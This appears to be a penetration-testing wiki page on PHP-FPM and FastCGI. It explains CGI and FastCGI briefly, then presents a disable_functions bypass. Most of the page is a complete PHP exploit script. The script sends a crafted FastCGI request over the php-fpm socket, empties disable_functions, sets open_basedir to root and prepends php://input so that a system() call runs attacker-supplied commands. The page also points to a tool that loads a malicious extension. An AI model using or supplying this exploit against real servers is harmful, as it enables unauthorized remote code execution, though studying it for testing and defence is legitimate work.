PHP fastCGI Process Manager is an alternative PHP FastCGI implementation with some additional features (mostly) useful for heavy-loaded sites.
Internally, PHP-FPM is organized as a “master process” managing pools of individual “worker processes.” When the web server has a request for a PHP script, the web server uses a proxy, FastCGI connection to forward the request to the PHP-FPM service. The PHP-FPM service can listen for these requests on the host server’s network ports or through Unix sockets. Although requests pass via a proxy connection, the PHP-FPM service must run on the same server as the web server. Notably, the proxy connection for PHP-FPM is not the same as a traditional proxy connection. As PHP-FPM receives a proxied connection, a free PHP-FPM worker accepts the web server’s request. PHP-FPM then compiles and executes the PHP script, sending the output back to the web server. Once a PHP-FPM worker finishes handling a request, the system releases the worker and waits for new requests.
But what is CGI and FastCGI?
CGI
Normally web pages, files and all of the documents which are transferred from the web server to the browser are stored in a specific public directory such as home/user/public_html. When the browser requests certain content, the server checks this directory and sends the required file to the browser.
If CGI is installed on the server, the specific cgi-bin directory is also added there, for example home/user/public_html/cgi-bin. CGI scripts are stored in this directory. Each file in the directory is treated as an executable program. When accessing a script from the directory, the server sends request to the application, responsible for this script, instead of sending file's content to the browser. After the input data processing is completed, the application sends the output data to the web server which forwards the data to the HTTP client.
For example, when the CGI script http://mysitename.com/**cgi-bin/file.pl** is accessed, the server will run the appropriate Perl application through CGI. The data generated from script execution will be sent by the application to the web server. The server, on the other hand, will transfer data to the browser. If the server did not have CGI, the browser would have displayed the .pl file code itself. (explanation from here)
FastCGI
FastCGI is a newer web technology, an improved CGI version as the main functionality remains the same.
The need to develop FastCGI is that Web was arisen by applications' rapid development and complexity, as well to address the scalability shortcomings of CGI technology. To meet those requirements Open Market introduced FastCGI – a high performance version of the CGI technology with enhanced capabilities.
disable_functions bypass
It's possible to run PHP code abusing the FastCGI and avoiding the disable_functions limitations.
Via Gopherus
I'm not sure if this is working in modern versions because I tried once and it didn't execute anything. Please, if you have more information about this contact me via **[PEASS & HackTricks telegram group here](https://t.me/peass), or twitter [@carlospolopm](https://twitter.com/carlospolopm).**
Using Gopherus you can generate a payload to send to the FastCGI listener and execute arbitrary commands:
Uploading and accessing this script the exploit is going to be sent to FastCGI (disabling disable_functions) and the specified commands are going to be executed.
PHP exploit
I'm not sure if this is working in modern versions because I tried once and I couldn't execute anything. Actually I managed to see that phpinfo() from FastCGI execution indicated that disable_functions was empty, but PHP (somehow) was still preventing me from executing any previously disabled function. Please, if you have more information about this contact me via **[PEASS & HackTricks telegram group here](https://t.me/peass), or twitter [@carlospolopm](https://twitter.com/carlospolopm).**
<?php/** * Note : Code is released under the GNU LGPL * * Please do not change the header of this file * * This library is free software; you can redistribute it and/or modify it under the terms of the GNU * Lesser General Public License as published by the Free Software Foundation; either version 2 of * the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. * * See the GNU Lesser General Public License for more details. *//** * Handles communication with a FastCGI application * * @author Pierrick Charron <pierrick@webstart.fr> * @version 1.0 */classFCGIClient{const VERSION_1 =1;const BEGIN_REQUEST =1;const ABORT_REQUEST =2;const END_REQUEST =3;const PARAMS =4;const STDIN =5;const STDOUT =6;const STDERR =7;const DATA =8;const GET_VALUES =9;const GET_VALUES_RESULT =10;const UNKNOWN_TYPE =11;const MAXTYPE =self::UNKNOWN_TYPE;const RESPONDER =1;const AUTHORIZER =2;const FILTER =3;const REQUEST_COMPLETE =0;const CANT_MPX_CONN =1;const OVERLOADED =2;const UNKNOWN_ROLE =3;const MAX_CONNS ='MAX_CONNS';const MAX_REQS ='MAX_REQS';const MPXS_CONNS ='MPXS_CONNS';const HEADER_LEN =8;/** * Socket * @varResource */private $_sock =null;/** * Host * @varString */private $_host =null;/** * Port * @varInteger */private $_port =null;/** * Keep Alive * @varBoolean */private $_keepAlive =false;/** * Constructor * * @paramString $host Host of the FastCGI application * @paramInteger $port Port of the FastCGI application */publicfunction__construct($host, $port =9000) // and default value for port, just for unixdomain socket {$this->_host = $host;$this->_port = $port; }/** * Define whether or not the FastCGI application should keep the connection * alive at the end of a request * * @paramBoolean $b true if the connection should stay alive, false otherwise */publicfunctionsetKeepAlive($b) {$this->_keepAlive = (boolean)$b;if (!$this->_keepAlive &&$this->_sock) {fclose($this->_sock); } }/** * Get the keep alive status * * @returnBoolean true if the connection should stay alive, false otherwise */publicfunctiongetKeepAlive() {return$this->_keepAlive; }/** * Create a connection to the FastCGI application */privatefunctionconnect() {if (!$this->_sock) {//$this->_sock = fsockopen($this->_host, $this->_port, $errno, $errstr, 5);$this->_sock =stream_socket_client($this->_host, $errno, $errstr,5);if (!$this->_sock) {thrownewException('Unable to connect to FastCGI application'); } } }/** * Build a FastCGI packet * * @paramInteger $type Type of the packet * @paramString $content Content of the packet * @paramInteger $requestId RequestId */privatefunctionbuildPacket($type, $content, $requestId =1) { $clen =strlen($content);returnchr(self::VERSION_1)/* version */.chr($type)/* type */.chr(($requestId >>8) &0xFF)/* requestIdB1 */.chr($requestId &0xFF)/* requestIdB0 */.chr(($clen >>8 ) &0xFF)/* contentLengthB1 */.chr($clen &0xFF)/* contentLengthB0 */.chr(0)/* paddingLength */.chr(0)/* reserved */. $content; /* content */ }/** * Build an FastCGI Name value pair * * @paramString $name Name * @paramString $value Value * @returnString FastCGI Name value pair */privatefunctionbuildNvpair($name, $value) { $nlen =strlen($name); $vlen =strlen($value);if ($nlen <128) {/* nameLengthB0 */ $nvpair =chr($nlen); } else {/* nameLengthB3 & nameLengthB2 & nameLengthB1 & nameLengthB0 */ $nvpair = chr(($nlen >> 24) | 0x80) . chr(($nlen >> 16) & 0xFF) . chr(($nlen >> 8) & 0xFF) . chr($nlen & 0xFF);
}if ($vlen <128) {/* valueLengthB0 */ $nvpair .=chr($vlen); } else {/* valueLengthB3 & valueLengthB2 & valueLengthB1 & valueLengthB0 */ $nvpair .= chr(($vlen >> 24) | 0x80) . chr(($vlen >> 16) & 0xFF) . chr(($vlen >> 8) & 0xFF) . chr($vlen & 0xFF);
}/* nameData & valueData */return $nvpair . $name . $value; }/** * Read a set of FastCGI Name value pairs * * @paramString $data Data containing the set of FastCGI NVPair * @returnarray of NVPair */privatefunctionreadNvpair($data, $length =null) { $array =array();if ($length ===null) { $length =strlen($data); } $p =0;while ($p != $length) { $nlen =ord($data{$p++});if ($nlen >=128) { $nlen = ($nlen &0x7F<<24); $nlen |= (ord($data{$p++})<<16); $nlen |= (ord($data{$p++})<<8); $nlen |= (ord($data{$p++})); } $vlen =ord($data{$p++});if ($vlen >=128) { $vlen = ($nlen &0x7F<<24); $vlen |= (ord($data{$p++})<<16); $vlen |= (ord($data{$p++})<<8); $vlen |= (ord($data{$p++})); } $array[substr($data, $p, $nlen)] =substr($data, $p+$nlen, $vlen); $p += ($nlen + $vlen); }return $array; }/** * Decode a FastCGI Packet * * @paramString $data String containing all the packet * @returnarray */privatefunctiondecodePacketHeader($data) { $ret =array(); $ret['version'] =ord($data{0}); $ret['type'] =ord($data{1}); $ret['requestId'] = (ord($data{2})<<8) +ord($data{3}); $ret['contentLength'] = (ord($data{4})<<8) +ord($data{5}); $ret['paddingLength'] =ord($data{6}); $ret['reserved'] =ord($data{7});return $ret; }/** * Read a FastCGI Packet * * @returnarray */privatefunctionreadPacket() {if ($packet =fread($this->_sock,self::HEADER_LEN)) { $resp =$this->decodePacketHeader($packet); $resp['content'] ='';if ($resp['contentLength']) { $len = $resp['contentLength'];while ($len && $buf=fread($this->_sock, $len)) { $len -=strlen($buf); $resp['content'] .= $buf; } }if ($resp['paddingLength']) { $buf=fread($this->_sock, $resp['paddingLength']); }return $resp; } else {returnfalse; } }/** * Get Informations on the FastCGI application * * @paramarray $requestedInfo information to retrieve * @returnarray */publicfunctiongetValues(array $requestedInfo) {$this->connect(); $request ='';foreach ($requestedInfo as $info) { $request .=$this->buildNvpair($info,''); }fwrite($this->_sock,$this->buildPacket(self::GET_VALUES, $request,0)); $resp =$this->readPacket();if ($resp['type'] ==self::GET_VALUES_RESULT) {return$this->readNvpair($resp['content'], $resp['length']); } else {thrownewException('Unexpected response type, expecting GET_VALUES_RESULT'); } }/** * Execute a request to the FastCGI application * * @paramarray $params Array of parameters * @paramString $stdin Content * @returnString */publicfunctionrequest(array $params, $stdin) { $response ='';$this->connect(); $request = $this->buildPacket(self::BEGIN_REQUEST, chr(0) . chr(self::RESPONDER) . chr((int) $this->_keepAlive) . str_repeat(chr(0), 5));
$paramsRequest ='';foreach ($params as $key => $value) { $paramsRequest .=$this->buildNvpair($key, $value); }if ($paramsRequest) { $request .=$this->buildPacket(self::PARAMS, $paramsRequest); } $request .=$this->buildPacket(self::PARAMS,'');if ($stdin) { $request .=$this->buildPacket(self::STDIN, $stdin); } $request .=$this->buildPacket(self::STDIN,'');fwrite($this->_sock, $request);do { $resp =$this->readPacket();if ($resp['type'] ==self::STDOUT || $resp['type'] ==self::STDERR) { $response .= $resp['content']; } } while ($resp && $resp['type'] !=self::END_REQUEST);var_dump($resp);if (!is_array($resp)) {thrownewException('Bad request'); }switch (ord($resp['content']{4})) {caseself::CANT_MPX_CONN:thrownewException('This app can\'t multiplex [CANT_MPX_CONN]');break;caseself::OVERLOADED:thrownewException('New request rejected; too busy [OVERLOADED]');break;caseself::UNKNOWN_ROLE:thrownewException('Role value not known [UNKNOWN_ROLE]');break;caseself::REQUEST_COMPLETE:return $response; } }}?><?php// real exploit start hereif (!isset($_REQUEST['cmd'])) {die("Check your input\n");}if (!isset($_REQUEST['filepath'])) { $filepath =__FILE__;}else{ $filepath = $_REQUEST['filepath'];}$req ='/'.basename($filepath);$uri = $req .'?'.'command='.$_REQUEST['cmd'];$client =newFCGIClient("unix:///var/run/php-fpm.sock",-1);$code ="<?php system(\$_REQUEST['command']); phpinfo(); ?>"; // php payload -- Doesnt do anything$php_value ="disable_functions = \nallow_url_include = On\nopen_basedir = /\nauto_prepend_file = php://input";//$php_value = "disable_functions = \nallow_url_include = On\nopen_basedir = /\nauto_prepend_file = http://127.0.0.1/e.php";
$params =array('GATEWAY_INTERFACE'=>'FastCGI/1.0','REQUEST_METHOD'=>'POST','SCRIPT_FILENAME'=> $filepath,'SCRIPT_NAME'=> $req,'QUERY_STRING'=>'command='.$_REQUEST['cmd'],'REQUEST_URI'=> $uri,'DOCUMENT_URI'=> $req,#'DOCUMENT_ROOT' => '/','PHP_VALUE'=> $php_value,'SERVER_SOFTWARE'=>'80sec/wofeiwo','REMOTE_ADDR'=>'127.0.0.1','REMOTE_PORT'=>'9985','SERVER_ADDR'=>'127.0.0.1','SERVER_PORT'=>'80','SERVER_NAME'=>'localhost','SERVER_PROTOCOL'=>'HTTP/1.1','CONTENT_LENGTH'=>strlen($code) );// print_r($_REQUEST);// print_r($params);//echo "Call: $uri\n\n";echo $client->request($params, $code)."\n";?>
This is a php script to exploit fastcgi protocol to bypass open_basedir and disable_functions.
It will help you to bypass strict disable_functions to RCE by loading the malicious extension.
You can access it here: https://github.com/w181496/FuckFastcgi
You will find that the exploit is very similar to the previous code, but instead of trying to bypass disable_functions using PHP_VALUE, it tries to load an external PHP module to execute code using the parameters extension_dir and extension inside the variable PHP_ADMIN_VALUE.
NOTE1: You probably will need to recompile the extension with the same PHP version that the server is using (you can check it inside the output of phpinfo):
NOTE2: I managed to make this work by inserting the extension_dir and extension values inside a PHP .ini config file (something that you won't be able to do attacking a server). But for some reason, when using this exploit and loading the extension from the PHP_ADMIN_VALUE variable the process just died, so I don't know if this technique is still valid.